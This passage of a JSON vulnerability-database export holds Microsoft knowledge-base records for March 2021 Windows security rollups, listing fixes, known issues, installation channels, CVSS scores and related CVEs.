Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).\n\n### Install this update\n\n**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000844>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n \n## File information\n\nFor a list of the files that are provided in this update, download the [file information for cumulative update 5000844](<https://download.microsoft.com/download/b/4/c/b4ca9728-4c2d-46fd-b3b9-769235c4305a/5000844.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mskb", "title": "March 9, 2021\u2014KB5000844 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2021-1640", "CVE-2021-26411"], "modified": "2021-03-09T08:00:00", "id": "KB5000844", "href": "https://support.microsoft.com/en-us/help/5000844", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T14:07:36", "description": "None\n**Important: **Verify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n\n**Important: **For information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 SP1 and Windows Server 2008 R2 SP1 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update [KB4601347](<https://support.microsoft.com/help/4601347>) (released February 9, 2021) and addresses the following issues: \n\n * Addresses an elevation of privilege security vulnerability documented in [CVE-2021-1640](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1640>) related to print jobs submitted to \u201cFILE:\u201d ports. After installing Windows updates from March 9, 2021 and later, print jobs that are in a pending state before restarting the print spooler service or restarting the OS will remain in an error state. Manually delete the affected print jobs and resubmit them to the print queue when the print spooler service is online.\n * Addresses an issue in which a non-native device that is in the same realm does not receive a Kerberos Service ticket from Active Directory DCs. This issue occurs even though Windows Updates are installed that contain [CVE-2020-17049](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17049>) protections released between November 10 and December 8, 2020 and configured **PerfromTicketSignature** to **1** or larger. Ticket acquisition fails with **KRB_GENERIC_ERROR** if callers submit a PAC-less Ticket Granting Ticket (TGT) as an evidence ticket without the **USER_NO_AUTH_DATA_REQUIRED** flag being set for the user in User Account Controls.\n * Security updates to Windows Fundamentals, Windows Shell, Windows UAC, Windows Hybrid Cloud Networking, and Windows Media.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website. \n\n## Known issues in this update\n\n**Symptom **| **Workaround ** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer,\u201d and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following: \n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing updates released March 9, 2021, you might get unexpected results when printing from some apps. Issues might include:\n\n * Elements of the document might print as solid black/color boxes or might be missing, including barcodes, QR codes, and graphics elements, such as logos.\n * Table lines might be missing. Other alignment or formatting issues might also be present.\n * Printing from some apps or to some printers might result in a blank page or label.\n| This issue is resolved in KB5001639. \n \n## How to get this update\n\n### Before installing this update\n\n**IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/home.aspx>).\nAfter you install the items above, we strongly recommend that you install the latest SSU ([KB4592510](<https://support.microsoft.com/help/4592510>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).\n\n### Install this update\n\n**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000841>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n \n## File information\n\nFor a list of the files that are provided in this update, download the [file information for cumulative update 5000841](<https://download.microsoft.com/download/a/9/4/a94093b0-8c1e-47e5-80cc-fa4164b21087/5000841.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mskb", "title": "March 9, 2021\u2014KB5000841 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2021-1640"], "modified": "2021-03-09T08:00:00", "id": "KB5000841", "href": "https://support.microsoft.com/en-us/help/5000841", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T14:07:40", "description": "None\n**Important: ** \n \nWindows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n**Important: ****March 9, 2021** \n \nAs part of the end of support for Adobe Flash, [KB4577586](<https://support.microsoft.com/help/4577586>) is now available as an optional update from Windows Update (WU) and Windows Server Update Services (WSUS). Installing KB4577586 will remove Adobe Flash Player permanently from your Windows device. Once installed, you cannot uninstall KB4577586. For more details about Microsoft\u2019s plans, see [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support>).\n\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update [KB4601348](<https://support.microsoft.com/help/4601348>) (released previous February 9, 2021) and addresses the following issues: \n\n * Addresses an elevation of privilege security vulnerability documented in [CVE-2021-1640](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1640>) related to print jobs submitted to \u201cFILE:\u201d ports. After installing Windows updates from March 9, 2021 and later, print jobs that are in a pending state before restarting the print spooler service or restarting the OS will remain in an error state. Manually delete the affected print jobs and resubmit them to the print queue when the print spooler service is online.\n * Addresses an issue in which a non-native device that is in the same realm does not receive a Kerberos Service ticket from Active Directory DCs. This issue occurs even though Windows Updates are installed that contain [CVE-2020-17049](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17049>) protections released between November 10 and December 8, 2020 and configured **PerfromTicketSignature** to **1** or larger. Ticket acquisition fails with **KRB_GENERIC_ERROR** if callers submit a PAC-less Ticket Granting Ticket (TGT) as an evidence ticket without the **USER_NO_AUTH_DATA_REQUIRED** flag being set for the user in User Account Controls.\n * Security updates to Windows Fundamentals, Windows Shell, Windows UAC, Windows Hybrid Cloud Networking, Windows Graphics, and Windows Media.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing updates released March 9, 2021, you might get unexpected results when printing from some apps. Issues might include:\n\n * Elements of the document might print as solid black/color boxes or might be missing, including barcodes, QR codes, and graphics elements, such as logos.\n * Table lines might be missing. Other alignment or formatting issues might also be present.\n * Printing from some apps or to some printers might result in a blank page or label.\n| This issue is resolved in KB5001641. \n \n## How to get this update\n\n### Before installing this update\n\nWe strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB4566426](<https://support.microsoft.com/help/4566426>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/home.aspx>). \n\n### Install this update\n\n**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000847>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Updates \n \n## File information\n\nFor a list of the files that are provided in this update, download the [file information for update 5000847](<https://download.microsoft.com/download/4/2/e/42eb70ea-a2d4-40aa-8e15-2694b8dbf658/5000847.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mskb", "title": "March 9, 2021\u2014KB5000847 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2021-1640"], "modified": "2021-03-09T08:00:00", "id": "KB5000847", "href": "https://support.microsoft.com/en-us/help/5000847", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:45:55", "description": "None\n**Important: ** \n \nWindows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n**Important: ****March 9, 2021** \n \nAs part of the end of support for Adobe Flash, [KB4577586](<https://support.microsoft.com/help/4577586>) is now available as an optional update from Windows Update (WU) and Windows Server Update Services (WSUS). Installing [KB4577586](<https://support.microsoft.com/help/4577586>) will remove Adobe Flash Player permanently from your Windows device. Once installed, you cannot uninstall this update. For more details about Microsoft\u2019s plans, see [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support>)..\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include: \n\n * Addresses an issue in which a non-native device that is in the same realm does not receive a Kerberos Service ticket from Active Directory DCs. This issue occurs even though Windows Updates are installed that contain [CVE-2020-17049](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17049>) protections released between November 10 and December 8, 2020 and configured **PerfromTicketSignature** to **1** or larger. Ticket acquisition fails with **KRB_GENERIC_ERROR** if callers submit a PAC-less Ticket Granting Ticket (TGT) as an evidence ticket without the **USER_NO_AUTH_DATA_REQUIRED** flag being set for the user in User Account Controls.\n * Security updates to Windows Fundamentals, Windows Shell, Windows UAC, Windows Hybrid Cloud Networking, Windows Graphics, and Windows Media.\nFor more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing updates released March 9, 2021, you might get unexpected results when printing from some apps. Issues might include:\n\n * Elements of the document might print as solid black/color boxes or might be missing, including barcodes, QR codes, and graphics elements, such as logos.\n * Table lines might be missing. Other alignment or formatting issues might also be present.\n * Printing from some apps or to some printers might result in a blank page or label.\n| This issue is resolved in KB5001641. \n \n## How to get this update\n\n### Before installing this update\n\nWe strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB4566426](<https://support.microsoft.com/help/4566426>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5000800](<https://support.microsoft.com/help/5000800>)).\n\n### Install this update\n\n**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000840>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Update \n \n## File information\n\nFor a list of the files that are provided in this update, download the [file information for cumulative update 5000840](<https://download.microsoft.com/download/0/5/3/0536be84-b1cb-47be-8cae-267f984263e6/5000840.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mskb", "title": "March 9, 2021\u2014KB5000840 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1640", "CVE-2020-17049"], "modified": "2021-03-09T08:00:00", "id": "KB5000840", "href": "https://support.microsoft.com/en-us/help/5000840", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:46:05", "description": "None\n**Important: ** \n \nWindows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n**Important: ****March 9, 2021** \n \nAs part of the end of support for Adobe Flash, [KB4577586](<https://support.microsoft.com/help/4577586>) is now available as an optional update from Windows Update (WU) and Windows Server Update Services (WSUS). Installing [KB4577586](<https://support.microsoft.com/help/4577586>) will remove Adobe Flash Player permanently from your Windows device. Once installed, you cannot uninstall this update. For more details about Microsoft\u2019s plans, see [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support>).\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include: \n\n * Addresses an issue in which a non-native device that is in the same realm does not receive a Kerberos Service ticket from Active Directory DCs. This issue occurs even though Windows Updates are installed that contain [CVE-2020-17049](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17049>) protections released between November 10 and December 8, 2020 and configured **PerfromTicketSignature** to **1** or larger. Ticket acquisition fails with **KRB_GENERIC_ERROR** if callers submit a PAC-less Ticket Granting Ticket (TGT) as an evidence ticket without the **USER_NO_AUTH_DATA_REQUIRED** flag being set for the user in User Account Controls.\n * Security updates to Windows Fundamentals, Windows Shell, Windows UAC, Windows Hybrid Cloud Networking, Windows Media, and Windows Graphics.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing updates released March 9, 2021, you might get unexpected results when printing from some apps. Issues might include:\n\n * Elements of the document might print as solid black/color boxes or might be missing, including barcodes, QR codes, and graphics elements, such as logos.\n * Table lines might be missing. Other alignment or formatting issues might also be present.\n * Printing from some apps or to some printers might result in a blank page or label.\n| This issue is resolved in KB5001640. \n \n## How to get this update\n\n### Before installing this update\n\nWe strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB4566425](<https://support.microsoft.com/help/4566425>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5000800](<https://support.microsoft.com/help/5000800>)).\n\n### Install this update\n\n**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5000853>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Updates \n \n## File information\n\nFor a list of the files that are provided in this update, download the [file information for update 5000853](<https://download.microsoft.com/download/c/6/6/c66f8597-5e15-4d1f-9aaf-55abbe41f1b0/5000853.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T08:00:00", "type": "mskb", "title": "March 9, 2021\u2014KB5000853 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1640", "CVE-2020-17049"], "modified": "2021-03-09T08:00:00", "id": "KB5000853", "href": "https://support.microsoft.com/en-us/help/5000853", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:46:03", "description": "None\n**Important: **Verify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n\n**Important: **For information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 SP1 and Windows Server 2008 R2 SP1 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include: \n\n * Addresses an issue in which a non-native device that is in the same realm does not receive a Kerberos Service ticket from Active Directory DCs. This issue occurs even though Windows Updates are installed that contain [CVE-2020-17049](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17049>) protections released between November 10 and December 8, 2020 and configured **PerfromTicketSignature** to **1** or larger. Ticket acquisition fails with **KRB_GENERIC_ERROR** if callers submit a PAC-less Ticket Granting Ticket (TGT) as an evidence ticket without the **USER_NO_AUTH_DATA_REQUIRED** flag being set for the user in User Account Controls.\n * Security updates to Windows Fundamentals, Windows Shell, Windows UAC, Windows Hybrid Cloud Networking, and Windows Media.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer,\u201d and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing updates released March 9, 2021, you might get unexpected results when printing from some apps. Issues might include:\n\n * Elements of the document might print as solid black/color boxes or might be missing, including barcodes, QR codes, and graphics elements, such as logos.\n * Table lines might be missing. Other alignment or formatting issues might also be present.\n * Printing from some apps or to some printers might result in a blank page or label.\n| This issue is resolved in KB5001639. \n \n## How to get this update\n\n### Before installing this 